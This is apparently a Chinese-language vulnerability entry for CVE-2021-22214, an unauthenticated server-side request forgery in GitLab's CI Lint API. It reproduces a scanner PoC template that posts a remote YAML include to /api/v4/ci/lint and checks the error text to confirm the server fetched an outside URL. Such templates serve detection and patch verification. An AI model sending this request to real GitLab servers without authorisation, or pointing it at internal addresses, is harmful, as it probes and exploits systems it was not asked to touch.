CVE-2021-22214: Unauthenticated Gitlab SSRF - CI Lint API

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

A Server-Side Request Forgery (SSRF) vulnerability in GitLab CE/EE 13.10.0 through 13.10.3, 13.9.0 through 13.9.6, and 13.8.0 through 13.8.8 allows an attacker to make the application perform requests to internal services.

PoC代码[已公开]

id: CVE-2021-22214

info:
  name: Unauthenticated Gitlab SSRF - CI Lint API
  author: mumu0215
  severity: high
  description: |-
    A Server-Side Request Forgery (SSRF) vulnerability in GitLab CE/EE 13.10.0 through 13.10.3, 13.9.0 through 13.9.6, and 13.8.0 through 13.8.8 allows an attacker to make the application perform requests to internal services.
  reference:
    - https://gitlab.com/gitlab-org/gitlab/-/issues/292243
    - https://hackerone.com/reports/1122315
  tags: cve,cve2021,gitlab,ssrf
  created: 2021/04/20

rules:
  r0:
    request:
      method: POST
      path: /api/v4/ci/lint
      headers:
        Content-Type: application/json
      body: |
        {"include_merged_yaml": true, "content": "include:\n  remote: http://baidu.com/api/v1/targets/?test.yml"}
    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"{\"status\":\"invalid\",\"errors\":") && (response.body.bcontains(b"does not have valid YAML syntax") || response.body.bcontains(b"could not be fetched"))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-22214.yaml